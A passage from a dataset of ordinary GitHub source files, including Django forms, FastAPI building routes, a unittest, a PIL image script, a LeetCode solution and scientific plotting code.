Layout, Fieldset, Submit, Field, HTML\nfrom crispy_forms.bootstrap import (\n FormActions,\n FieldWithButtons,\n PrependedText,\n TabHolder,\n Tab\n)\nfrom haystack.forms import SearchForm\n\nfrom .models import MovieInCollection, Collection\n\n\nclass BetterDateTimeInput(forms.DateTimeInput):\n input_type = 'datetime'\n\n def __init__(self, *args, **kwargs):\n forms.DateTimeInput.__init__(self, *args, **kwargs)\n\n\nclass CollectionForm(forms.ModelForm):\n class Meta:\n model = Collection\n fields = ['title']\n\n def __init__(self, *args, **kwargs):\n super(CollectionForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = \"form-horizontal\"\n self.helper.label_class = 'col-3'\n self.helper.field_class = 'col-9'\n self.helper.layout = Layout(\n 'title',\n FormActions(\n Submit(\"submit\", \"Create\")\n )\n )\n\n\nclass MovieForm(forms.ModelForm):\n class Meta:\n model = MovieInCollection\n fields = ['title', 'date', 'tags', 'collection']\n\n title = forms.CharField()\n jstags = forms.CharField(label=\"Tags\", required=False)\n imdb_id = forms.CharField(required=False)\n date = forms.DateTimeField(\n initial=datetime.datetime.now,\n widget=BetterDateTimeInput)\n\n def __init__(self, request, *args, **kwargs):\n super(MovieForm, self).__init__(*args, **kwargs)\n\n self.fields[\"collection\"].queryset = Collection.objects.filter(\n user=request.user)\n\n self.helper = FormHelper()\n self.helper.form_class = \"form-horizontal\"\n self.helper.help_text_inline = True\n self.helper.label_class = 'col-3'\n self.helper.field_class = 'col-9'\n self.helper.attrs['autocomplete'] = 'off'\n self.helper.html5_required = True\n self.helper.layout = Layout(\n Field(\n 'title',\n css_class=\"form-control-lg movie-title-typeahead\"),\n PrependedText(\n 'date',\n '',\n css_class=\"input-medium\"),\n Field('tags', type=\"hidden\"),\n Field(\n 'jstags',\n css_class=\"tagManager\",\n placeholder=\"Tag\"),\n Field('collection', css_class=\"input-medium\"),\n Field(\n 'imdb_id',\n css_class=\"movie-imdb_id-typeahead input-small\"),\n FormActions(\n Submit(\"submit\", \"Add\")\n )\n )\n\n\nclass MovieEditForm(MovieForm):\n def __init__(self, *args, **kwargs):\n super(MovieEditForm, self).__init__(*args, **kwargs)\n\n instance = kwargs['instance']\n self.fields['title'].initial = instance.movie.title\n self.fields['imdb_id'].initial = instance.movie.imdb_id\n self.fields['date'].initial = instance.date\n tag_names = [x.name for x in instance.tags.all()]\n self.fields['jstags'].initial = \",\".join(tag_names)\n\n side_effect_title = \"These affects to all movie items.\"\n side_effect_message = \"If movie IMDB ID or title is modified \" \\\n \"then all related 'watch dates' or related \" \\\n \"collections are also changed.\"\n\n side_effect_alert = HTML(\n '
' +\n side_effect_title +\n '

' +\n side_effect_message +\n '

'\n )\n\n cancel_url = reverse('detail-movie', args=(instance.id,))\n\n self.helper.layout = Layout(\n TabHolder(\n Tab(\n 'Movie item',\n PrependedText(\n 'date',\n '',\n css_class=\"input-medium\"\n ),\n Field('collection', css_class=\"input-medium\"),\n Field('tags', type=\"hidden\"),\n Field(\n 'jstags',\n css_class=\"input-small tagManager\",\n placeholder=\"Tag\"),\n ),\n Tab(\n 'Movie',\n side_effect_alert,\n Field(\n 'title',\n css_class=\"input-xlarge movie-title-typeahead\"),\n Field(\n 'imdb_id',\n css_class=\"movie-imdb_id-typeahead input-small\"),\n )\n ),\n FormActions(\n Submit(\"submit\", \"Save\"),\n HTML(\n 'Cancel')\n )\n )\n\n\nclass ImportForm(forms.Form):\n class Meta:\n layout = (\n Fieldset(\"Import movies from CVS\", 'data'),\n )\n data = forms.CharField(widget=forms.Textarea)\n\n def __init__(self, *args, **kwargs):\n super(ImportForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = \"form-horizontal\"\n self.helper.label_class = 'col-3'\n self.helper.field_class = 'col-9'\n self.helper.layout = Layout(\n Fieldset(\n 'Import',\n 'data',\n FormActions(\n Submit(\"submit\", \"Import\")\n )\n )\n )\n\n\nclass MovieSearchForm(SearchForm):\n def __init__(self, *args, **kwargs):\n super(MovieSearchForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_method = \"get\"\n self.helper.form_class = \"form-horizontal form-search\"\n self.helper.layout = Layout(\n FieldWithButtons(\n Field('q', css_class=\"search-query\"),\n Submit(\"submit\", \"Search\"), css_class=\"input-search\"),\n )\n","repo_name":"zcmander/mlist","sub_path":"mlist/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33514458523","text":"# (c) 2014 Amplify Education, Inc. All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\n__author__ = 'npandey'\n\n\nimport unittest\nfrom unittest.mock import MagicMock\nfrom edextract.student_reg_extract_processors.ed_org_data_processor import EdOrgDataProcessor\nfrom edextract.student_reg_extract_processors.attribute_constants import AttributeFieldConstants\nfrom edextract.trackers.total_tracker import TotalTracker\n\n\nclass TestEdOrgDataProcessor(unittest.TestCase):\n\n def setUp(self):\n self.tracker = TotalTracker()\n self.tracker.track_academic_year = MagicMock(return_value=None)\n self.tracker.track_matched_ids = MagicMock(return_value=None)\n self.tracker.track_asmt = MagicMock(return_value=None)\n\n self.category_tracker = [self.tracker]\n\n EdOrgDataProcessor.__abstractmethods__ = set() # Make this class instantiable for these tests only.\n self.data_processor = EdOrgDataProcessor(self.category_tracker, {})\n\n self.data = {AttributeFieldConstants.STATE_NAME: 'North Carolina', AttributeFieldConstants.STATE_CODE: 'NC'}\n\n def test_call_tracker(self):\n self.data_processor._call_academic_year_trackers('123', self.data)\n self.tracker.track_academic_year.assert_called_with('123', self.data)\n\n self.data_processor._call_academic_year_trackers('456', self.data)\n self.tracker.track_academic_year.assert_called_with('456', self.data)\n\n self.data_processor._call_academic_year_trackers('789', self.data)\n self.tracker.track_academic_year.assert_called_with('789', self.data)\n\n def test_call_matched_trackers(self):\n self.data_processor._call_matched_ids_trackers('123', self.data)\n self.tracker.track_matched_ids.assert_called_with('123', self.data)\n\n self.data_processor._call_matched_ids_trackers('456', self.data)\n self.tracker.track_matched_ids.assert_called_with('456', self.data)\n\n self.data_processor._call_matched_ids_trackers('789', self.data)\n self.tracker.track_matched_ids.assert_called_with('789', self.data)\n\n def test_add_to_and_get_ed_org_hierarchy(self):\n self.data_processor._add_to_edorg_hierarchy('123', 'NC')\n self.data_processor._add_to_edorg_hierarchy('456', 'NC', 'Gilfford')\n self.data_processor._add_to_edorg_hierarchy('789', 'NC', 'Gilfford', 'Daybreak School')\n\n self.assertEqual(3, len(self.data_processor.get_ed_org_hierarchy()))\n self.assertEqual('123', self.data_processor.get_ed_org_hierarchy()[('NC', '', '')])\n self.assertEqual('456', self.data_processor.get_ed_org_hierarchy()[('NC', 'Gilfford', '')])\n self.assertEqual('789', self.data_processor.get_ed_org_hierarchy()[('NC', 'Gilfford', 'Daybreak School')])\n\n def test_call_asmt_trackers(self):\n self.data_processor._call_asmt_trackers('123', self.data)\n self.tracker.track_asmt.assert_called_with('123', self.data)\n\n self.data_processor._call_asmt_trackers('456', self.data)\n self.tracker.track_asmt.assert_called_with('456', self.data)\n\n self.data_processor._call_asmt_trackers('789', self.data)\n self.tracker.track_asmt.assert_called_with('789', self.data)\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edextract/edextract/tests/student_reg_extract_processors/test_ed_org_data_processor.py","file_name":"test_ed_org_data_processor.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"9067143926","text":"from PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\n# Image stuff\nth_size = 50, 50\nimg = Image.open(\"levelup_bg2.jpg\")\navatar = Image.open(\"avatar_test.jpg\")\ndraw = ImageDraw.Draw(img, 'RGBA')\n\n# Font stuff\nfont = \"Roboto-Black.ttf\"\nname_font = ImageFont.truetype(font, 12)\nlevel_font = ImageFont.truetype(font, 26)\nbase_color = (60, 60, 70)\nexp_color = (190, 190, 200)\n\n# # Experimental variables\nusername = 'EnragedNUKE'\nlevel = 9\n\n# # Avatar background filler\ndraw.rectangle([13,8,67,62], fill=(0,0,0,50))\n\n# # Avatar handling\na_im = avatar.crop((0,0,128,128)).resize(th_size, Image.ANTIALIAS)\nimg.paste(a_im, (15,10,65,60))\n\n# Text implementation\ndraw.text((15, 63), \"Level Up!\", base_color, font=name_font)\ndraw.text((25 if level > 9 else 33,72), str(level), base_color, font=level_font)\n\n# # EXP Bar\n# draw.rectangle([110,33,290,45], outline=exp_color)\n# draw.rectangle([112,35,112+(290-112)*(exp/max_exp),43], fill=exp_color)\n\n# # Text implementation\n# exp_message = \"EXP: {} / {}\".format(exp, max_exp)\n# w, h = draw.textsize(exp_message)\n# draw.text((110, 15), username, base_color, font=name_font) # Username\n# draw.text((125+(180-w)/2, 35), exp_message, base_color, font=exp_font) # EXP\n# draw.text((110,48), \"Level\", base_color, font=level_label_font)\n\n# w,h = draw.textsize(str(level))\n# draw.text((110 if level > 9 else 118, 58), str(level), base_color, font=level_font)\n# draw.rectangle([154,52,155,86], fill=exp_color)\n\n# draw.text((162, 55), \"Overall ranking\", base_color, font=placing_font)\n# draw.text((162, 70), \"Total score\", base_color, font=placing_font)\n\n# draw.text((250, 55), \"#{}\".format(s_placing), base_color, font=placing_font)\n# draw.text((250, 70), str(s_score), base_color, font=placing_font)\n\n# #draw.text((0,0),\"Text Test\",(255,255,255),font=font)\nimg.save('bg2-out.jpg')","repo_name":"ennukee/djb_script_challenges","sub_path":"python/Miscellaneous/PIL tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27490286919","text":"'''\nGiven a linked list, remove the n-th node from the end of list and return its head.\n\nExample:\n\nGiven linked list: 1->2->3->4->5, and n = 2.\n\nAfter removing the second node from the end, the linked list becomes 1->2->3->5.\nNote:\n\nGiven n will always be valid.\n\nFollow up:\n\nCould you do this in one pass?\n'''\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n\n # 快慢指针(一刷)\n first = ListNode(0) # 处理长度为一,删除后,为空链表的请款,需要设置一个虚节点\n first.next = head\n fast,slow = first,first\n for i in range(n):\n fast = fast.next\n while fast.next:\n fast = fast.next\n slow = slow.next\n slow.next = slow.next.next\n\n return first.next\n\n\n # Approach one 双指针,前后距离为n (二刷)\n first = second = head\n while n:\n first = first.next\n n -= 1\n if not first : return head.next\n while first.next: # 前指针定位到最后一个结点,后指针位于要删除结点的前面一位\n first = first.next\n second = second.next\n second.next = second.next.next\n return head\n","repo_name":"OnlyChristmas/leetcode","sub_path":"Python/remove-nth-node-from-end-of-list.py","file_name":"remove-nth-node-from-end-of-list.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"29203093197","text":"from fastapi import Depends, HTTPException, Request\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import Session\n\nfrom auth_api import get_user\nfrom db import get_db\nfrom models import PermissionSet\nfrom models.location import Building, BuildingType\nfrom permissions import has_permission\nfrom request_models import create_pagination_model\nfrom request_models.location_requests import BuildingModel, AddBuildingModel, ChangeBuildingModel, BuildingTypeModel, \\\n AddBuildingTypeModel, BuildingTypeCountModel\nfrom routes import metrics_router\nfrom utils import paginate, apply_filtering\n\n\n@metrics_router.get(\"/building-types/\", status_code=200, response_model=create_pagination_model(BuildingTypeModel))\nasync def get_building_types(request: Request, db: Session = Depends(get_db), ):\n has_permission(request, PermissionSet.BuildingTypeRead.value)\n return paginate(\n db=db,\n db_model=BuildingType,\n serializer=BuildingTypeModel,\n request=request\n )\n\n\n@metrics_router.get(\"/building-types/count/\", status_code=200,\n response_model=create_pagination_model(BuildingTypeCountModel))\nasync def get_building_types_count(request: Request, db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingTypeRead.value)\n result_models, count, page_number = apply_filtering(db, BuildingType, request)\n items = [BuildingTypeCountModel(id=b.id, name=b.name, buildings_count=len(b.buildings)) for b in result_models]\n return {\n 'total_size': count,\n 'page_number': page_number,\n 'page_size': len(items),\n 'items': items\n }\n\n\n@metrics_router.post(\"/building-types/\", status_code=201, response_model=BuildingTypeModel)\nasync def add_building_type(request: Request, body: AddBuildingTypeModel, db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingTypeEdit.value)\n building_type = BuildingType(name=body.name)\n db.add(building_type)\n try:\n db.commit()\n except IntegrityError:\n raise HTTPException(detail='BuildingType already exists', status_code=400)\n return BuildingTypeModel.from_orm(building_type)\n\n\n@metrics_router.patch(\"/building-types/{building_type_id}\", status_code=200, response_model=BuildingTypeModel)\nasync def patch_building_type(request: Request, building_type_id: int, body: AddBuildingTypeModel,\n db: Session = Depends(get_db), ):\n has_permission(request, PermissionSet.BuildingTypeEdit.value)\n building_type = db.query(BuildingType).filter_by(id=building_type_id).first()\n\n building_type.name = body.name\n db.add(building_type)\n db.commit()\n return BuildingTypeModel.from_orm(building_type)\n\n\n@metrics_router.delete(\"/building-types/{building_type_id}/\", status_code=200)\nasync def remove_building_type(request: Request, building_type_id: int, db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingTypeEdit.value)\n db.query(BuildingType).filter_by(id=building_type_id).delete()\n db.commit()\n return \"\"\n\n\n@metrics_router.get(\"/buildings/\", status_code=200, response_model=create_pagination_model(BuildingModel))\nasync def get_buildings(request: Request, db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingRead.value)\n paginated = paginate(\n db=db,\n db_model=Building,\n serializer=BuildingModel,\n request=request\n )\n for index, building in enumerate(paginated['items']):\n for user in building.responsible_people:\n user.user = get_user(user.user_id)\n return paginated\n\n\n@metrics_router.post(\"/buildings/\", status_code=201, response_model=BuildingModel)\nasync def add_building(request: Request, body: AddBuildingModel, db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingEdit.value)\n building = Building(**body.dict())\n db.add(building)\n try:\n db.commit()\n except IntegrityError:\n raise HTTPException(detail='Building already exists', status_code=400)\n return BuildingModel.from_orm(building)\n\n\n@metrics_router.patch(\"/buildings/{building_id}\", status_code=200, response_model=BuildingModel)\nasync def patch_building(request: Request, building_id: int, body: ChangeBuildingModel,\n db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingEdit.value)\n building = db.query(Building).filter_by(id=building_id).first()\n\n args = {k: v for k, v in body.dict(exclude_unset=True).items()}\n if args:\n for k, v in args.items():\n setattr(building, k, v)\n\n db.add(building)\n db.commit()\n return BuildingModel.from_orm(building)\n\n\n@metrics_router.delete(\"/buildings/{building_id}/\", status_code=200)\nasync def remove_building(request: Request, building_id: int, db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingEdit.value)\n db.query(Building).filter_by(id=building_id).delete()\n db.commit()\n return \"\"\n","repo_name":"Nerphist/microservice-architecture","sub_path":"metrics_service/routes/locations/buildings.py","file_name":"buildings.py","file_ext":"py","file_size_in_byte":5044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19163227722","text":"import pickle\nfrom tqdm import tqdm\nfrom library.HRNN import validation_output\nfrom library.HRNN import eval_conll2000\n\ndef eval_hu(test_data, test_tags_gt, single_words=False, **args):\n output = \"\"\n for i, (pair, true_tag) in tqdm(enumerate(zip(test_data, test_tags_gt)), total=len(test_data)):\n if single_words:\n ind = [1 for t in pair[1]]\n else:\n ind = [t=='2' for t in pair[1]]\n vo = validation_output(ind, true_tag)\n output += vo\n fscore, acc = eval_conll2000(output, **args)\n return fscore, acc\n\n\nif __name__ == \"__main__\":\n # TEST_PATH = \"experiments/second_order_hiddendim_anal_FA/test_predicted_0.pkl\"\n TEST_PATH = \"HRNNdata_fa/test.pkl\"\n TEST_TRUE_TAGS_PATH = \"HRNNdata_fa/test_tag.pkl\"\n\n test_data = pickle.load(open(TEST_PATH, 'rb'))\n test_tags_gt = pickle.load(open(TEST_TRUE_TAGS_PATH, 'rb'))#[:len(test_data)]\n print(len(test_data), len(test_tags_gt))\n fscore, acc = eval_hu(test_data, test_tags_gt)\n print( \" __________________________________\")\n print(f\"| Test:\")\n print(f\"| F1: {fscore}\")\n print(f\"| Accuracy: {acc}\")\n print( \"|__________________________________\")","repo_name":"ShayeghB/HRNN-Unsupervised-Chunking","sub_path":"eval_heuristic.py","file_name":"eval_heuristic.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21539320858","text":"from greplin import scales\nfrom flask import Flask\n\n\nSTATS = scales.collection('/web', scales.PmfStat('latency'))\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello():\n with STATS.latency.time():\n return 'finished'\n\n\nif __name__ == '__main__':\n app.run(port=8888)\n","repo_name":"emilssolmanis/tapes","sub_path":"benchmark/flask/scales_metrics_single_process.py","file_name":"scales_metrics_single_process.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"24237466182","text":"# creating color map and manipulating color bar\r\n\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\n# import matplotlib.cm as cm\r\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\r\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\r\n\r\ninterp = 'bilinear'\r\ncdw = -0.65\r\neta = 0.003\r\nmu = -0.23\r\nsave_path = f'D:/phd_projects/NTU/exciton_NTU/6-fold-DOS/separate_cosine_terms/data_xedge_eta_{eta}/'\r\n\r\ndata1 = np.loadtxt(f'unitcell_avg_ldos_data_sm_2pi6_mu{mu}_eta_{eta}_cdw{cdw}.dat')\r\n\r\nnx = 6\r\nny = 40\r\nlayer = int(ny/2)\r\nplotting_layer = int(ny/2)\r\n\r\n# en1 = -50\r\n# en2 = -20\r\n\r\n# for i in range(len(data1)):\r\n# if data1[i, 0] == en1:\r\n# e1_num = i\r\n\r\n# for j in range(len(data1)):\r\n# if data1[j, 0] == en2:\r\n# e2_num = j\r\n\r\nen_line = -30\r\nfor j in range(len(data1)):\r\n if data1[j, 0] == en_line:\r\n eline_num = j\r\n\r\n\r\n# print(e1_num,e2_num)\r\n\r\n\r\n# define function for custom aspect ratio\r\ndef forceaspect(ax, aspect=1):\r\n im = ax.get_images()\r\n extent = im[0].get_extent()\r\n ax.set_aspect(abs((extent[1] - extent[0]) / (extent[3] - extent[2])) / aspect)\r\n\r\n\r\n\"\"\"for a perticular energy (line cut)\"\"\"\r\ndata2 = data1[eline_num, 1:nx * layer + 1]\r\n\r\n\r\ndata = data2.reshape(layer, nx)\r\n# print(data2)\r\nnew_data = []\r\nfor i in range(plotting_layer, 0, -1):\r\n for j in range(0, len(data[0])):\r\n new_data.append([j + 1, i, data[i - 1, j]])\r\ninfo = 'X(a) Y(b) DOS'\r\nnp.savetxt(f\"{save_path}Topographic_DOS_data_E_{en_line}.dat\", new_data, header=info, fmt=\"%10.6f\")\r\n# colors = ['navy', 'blue', 'red', '#FFFF14']\r\n# colors = ['navy', 'dodgerblue', 'red','white']\r\n# cmap_name = 'my_list'\r\n# cm = LinearSegmentedColormap.from_list(\r\n# cmap_name, colors, N=1000)\r\n# norm = mpl.colors.Normalize(vmin=np.min(data), vmax=np.max(data))\r\n\r\nplt.rcParams[\"figure.figsize\"] = [12, 4]\r\nplt.rcParams[\"figure.autolayout\"] = True\r\nfig = plt.figure()\r\n\r\n\r\nax1 = fig.add_subplot(131)\r\n\r\nxtic = np.linspace(1,nx,nx)\r\nytic = np.round(np.array([i for i in range(1,plotting_layer,int(plotting_layer/5))]))\r\n\r\nx, y, z = np.loadtxt(f'{save_path}Topographic_DOS_data_E_{en_line}.dat', skiprows=1, unpack=True)\r\nN = int(nx)\r\nz = z.reshape(plotting_layer, N)\r\nax1.set_xlabel('X(a)', fontsize=18)\r\nax1.set_ylabel('Y(b)', fontsize=18)\r\nax1.set_xticks(xtic,fontsize=18)\r\nax1.set_yticks(ytic,fontsize=18)\r\nax1.set_title(f\"{en_line} meV\", fontsize=15)\r\n# plt.ylim(2, plotting_layer)\r\n# plt.subplot(1,3,1)\r\nim=ax1.imshow(z, interpolation=interp, extent=(np.amin(x), np.amax(x), np.amin(y), np.amax(y)))#,cmap=cm, norm=norm)\r\nforceaspect(ax1, aspect=0.8)\r\n\r\nax1.tick_params(direction='out', length=5, width=1, colors='k', bottom=True, top=False, left=True, right=False)\r\nfig.colorbar(im)\r\n# plt.savefig(f\"topo_ldos_sum_all_density_xe_OP_pi_sm_2pi6_mu{mu}.png\", dpi=600)\r\n# plt.savefig(f\"topograph_DOS_en{en_line}.png\", dpi=600)\r\n\r\n# plt.show()\r\n\r\n#%%\r\n#x-edge-line-cut-slong-edge\r\nplt.rcParams[\"figure.figsize\"] = [5, 7]\r\nplt.rcParams[\"figure.autolayout\"] = True\r\n\r\nax2 = fig.add_subplot(132)\r\nx_list = np.linspace(1,nx,nx)\r\nytic2 = np.linspace(0.03,0.1,int(5))\r\n# plt.subplot(1,3,2)\r\nax2.plot(x_list,z[plotting_layer-1],'k')\r\nax2.set_xlabel('X(a)', fontsize=18)\r\nax2.set_ylabel('DOS', fontsize=18)\r\nax2.set_title(\"line cut of DOS along X edge\\n\", fontsize=15)\r\nax2.set_xlim(0,7)\r\n# ax2.set_xticks(x_list,fontsize=18)\r\n# ax2.set_yticks(ytic2,fontsize=18)\r\n# forceaspect(ax2, aspect=0.4)\r\n\r\nax2.tick_params(direction='in', length=5, width=1, colors='k', bottom=True,\r\n top=False, left=True, right=False)\r\n# plt.savefig(f\"x_edge_DOS_line_cut_{en_line}.png\",dpi = 300)\r\n# plt.show()\r\n\r\n\r\n\r\n#%%\r\n#x-edge-line-cut-across-edge\r\n# c_list = ['red','blue','green','yellow','pink','black']\r\n# label_list = ['X = 1','X = 2','X = 3','X = 4','X = 5','X = 6']\r\n# plt.rcParams[\"figure.figsize\"] = [5, 5]\r\n# plt.rcParams[\"figure.autolayout\"] = True\r\ny_list = np.linspace(1,plotting_layer,plotting_layer)\r\nytic3 = np.linspace(0.03,0.1,5)\r\nxtic3 = np.round(np.linspace(1,plotting_layer,int(plotting_layer/5)))\r\n\r\n\r\nax3 = fig.add_subplot(133)\r\n# plt.subplot(1,3,3)\r\nfor i in range(int(nx)):\r\n ax3.plot(y_list,np.flip(z.T[i]))#,c_list[i])#,label=label_list[i])\r\n ax3.legend(loc=(0.2,0.7),fontsize=12,ncol=2,frameon=False)\r\n \r\nax3.set_xlabel('Y(b)', fontsize=18)\r\nax3.set_ylabel('DOS', fontsize=18)\r\nax3.set_title(\"line cut of DOS across X edge\\n\", fontsize=15)\r\n# ax3.set_xticks(xtic3,fontsize=18)\r\n# ax3.set_yticks(ytic3,fontsize=18)\r\n\r\n\r\nax3.tick_params(direction='in', length=5, width=1, colors='k', bottom=True,\r\n top=False, left=True, right=False)\r\n# plt.savefig(f\"x_edge_DOS_across_line_cut_{en_line}.png\",dpi = 300)\r\nplt.savefig(f\"{save_path}x_edge_{en_line}.png\",dpi = 300)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nline_cut = np.array([x_list,z[plotting_layer-1]]).T\r\nnp.savetxt(f\"{save_path}x_edge_DOS_along_edge{en_line}.dat\",line_cut, fmt=\"%10.6f\")\r\n\r\nline_cut = np.array([y_list,np.flip(z.T[0]),np.flip(z.T[1]),np.flip(z.T[2]),np.flip(z.T[3]),np.flip(z.T[4]),np.flip(z.T[5])]).T\r\nnp.savetxt(f\"{save_path}x_edge_DOS_across_edge{en_line}.dat\",line_cut, fmt=\"%10.6f\")\r\n#%%\r\n# \"\"\"CDW order parameter\"\"\"\r\n\r\n# # define function for custom aspect ratio\r\n# def forceaspect(ax, aspect=1):\r\n# im = ax.get_images()\r\n# extent = im[0].get_extent()\r\n# ax.set_aspect(abs((extent[1] - extent[0]) / (extent[3] - extent[2])) / aspect)\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111)\r\n# # colors = ['navy', 'blue', 'red', '#FFFF14']\r\n# colors = ['navy', 'dodgerblue', 'red','white']\r\n# # colors = ['r','y']\r\n# cmap_name = 'my_list'\r\n# cm = LinearSegmentedColormap.from_list(\r\n# cmap_name, colors, N=1000)\r\n# norm = mpl.colors.Normalize(vmin=np.min(data), vmax=np.max(data))\r\n\r\n# # plt.rcParams[\"figure.figsize\"] = [6, 5]\r\n# # plt.rcParams[\"figure.autolayout\"] = True\r\n\r\n# # den_data = np.loadtxt(\"density_data_semi_metallic.dat\")\r\n# den_data = np.loadtxt(\"WTe2_cdw_gap_data.dat\")\r\n# dd = den_data.reshape(int(len(den_data)/4),4)\r\n# x_list = np.linspace(1,nx,nx) \r\n# y_list = np.linspace(1,ny,ny) \r\n# density_grid = (sum(dd.T)/4).reshape(ny,nx)\r\n\r\n# plt.imshow(density_grid, interpolation=interp,extent=(np.amin(x_list), np.amax(x_list), np.amin(y_list), np.amax(y_list)),\r\n# cmap=cm)\r\n# forceaspect(ax, aspect=1)\r\n\r\n# plt.xlabel('X', fontsize=18)\r\n# plt.ylabel('Y', fontsize=18)\r\n# plt.xticks(fontsize=18)\r\n# plt.yticks(fontsize=18)\r\n# plt.tick_params(direction='out', length=5, width=1, colors='k', bottom=True,\r\n# top=False, left=True, right=False)\r\n# plt.colorbar()\r\n# plt.show()\r\n\r\n# \"\"\"CDW order parameter\"\"\"\r\n\r\n# # define function for custom aspect ratio\r\n# # def forceaspect(ax, aspect=1):\r\n# # im = ax.get_images()\r\n# # extent = im[0].get_extent()\r\n# # ax.set_aspect(abs((extent[1] - extent[0]) / (extent[3] - extent[2])) / aspect)\r\n# # fig = plt.figure()\r\n# # ax = fig.add_subplot(111)\r\n# # colors = ['navy', 'blue', 'red', '#FFFF14']\r\n# colors = ['navy', 'dodgerblue', 'red','white']\r\n# # colors = ['r','y']\r\n# cmap_name = 'my_list'\r\n# cm = LinearSegmentedColormap.from_list(\r\n# cmap_name, colors, N=1000)\r\n# norm = mpl.colors.Normalize(vmin=np.min(data), vmax=np.max(data))\r\n\r\n# plt.rcParams[\"figure.figsize\"] = [6, 5]\r\n# plt.rcParams[\"figure.autolayout\"] = True\r\n\r\n# # den_data = np.loadtxt(\"density_data_semi_metallic.dat\")\r\n# den_data = np.loadtxt(\"WTe2_cdw_gap_data.dat\")\r\n# dd = den_data.reshape(int(len(den_data)/4),4)\r\n# x_list = np.linspace(1,nx,nx) \r\n# y_list = np.linspace(1,ny,ny) \r\n# density_grid = (sum(dd.T)/4).reshape(ny,nx)\r\n\r\n# plt.imshow(density_grid, interpolation=interp,extent=(np.amin(x_list), np.amax(x_list), np.amin(y_list), np.amax(y_list)),\r\n# cmap=cm)\r\n# # forceaspect(ax, aspect=1)\r\n\r\n# plt.xlabel('X', fontsize=18)\r\n# plt.ylabel('Y', fontsize=18)\r\n# plt.xlim(1,6)\r\n# plt.xticks(fontsize=18)\r\n# plt.yticks(fontsize=18)\r\n# plt.tick_params(direction='out', length=5, width=1, colors='k', bottom=True,\r\n# top=False, left=True, right=False)\r\n# plt.colorbar()\r\n# plt.show()\r\n\r\n\r\n","repo_name":"anirban8653/excitonic_insulator","sub_path":"plot_xe.py","file_name":"plot_xe.py","file_ext":"py","file_size_in_byte":8083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23241461505","text":"# 给你二叉树的根节点 root 和一个整数目标和 targetSum ,找出所有 从根节点到叶子节点 路径总和等于给定目标和的路径。\n#\n# 叶子节点 是指没有子节点的节点。\n#\n\n# 需要遍历整个树,所以递归无返回值\n# Definition for a 7.binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def __init__(self):\n self.res = []\n self.path = []\n\n def calSum(self, root, count):\n if not root.left and not root.right and not count:\n self.res.append(self.path[:])\n return\n if not root.left and not root.right and count:\n return\n\n if root.left:\n self.path.append(root.left.val)\n count -= root.left.val\n self.calSum(root.left, count)\n count += root.left.val\n self.path.pop()\n if root.right:\n self.path.append(root.right.val)\n count -= root.right.val\n self.calSum(root.right, count)\n count += root.right.val\n self.path.pop()\n\n def pathSum(self, root: Optional[TreeNode], targetSum: int) -> List[List[int]]:\n if not root:\n return []\n self.path = [root.val]\n self.calSum(root, targetSum - root.val)\n return self.res","repo_name":"vandeppce/algorithm","sub_path":"7.binary tree/113PathSum.py","file_name":"113PathSum.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73105750249","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 21 22:29:46 2020\r\n\r\n@author: kingslayer\r\n\"\"\"\r\n\r\n#POLYNOMIAL REGRESSION\r\nimport numpy as np\r\nimport 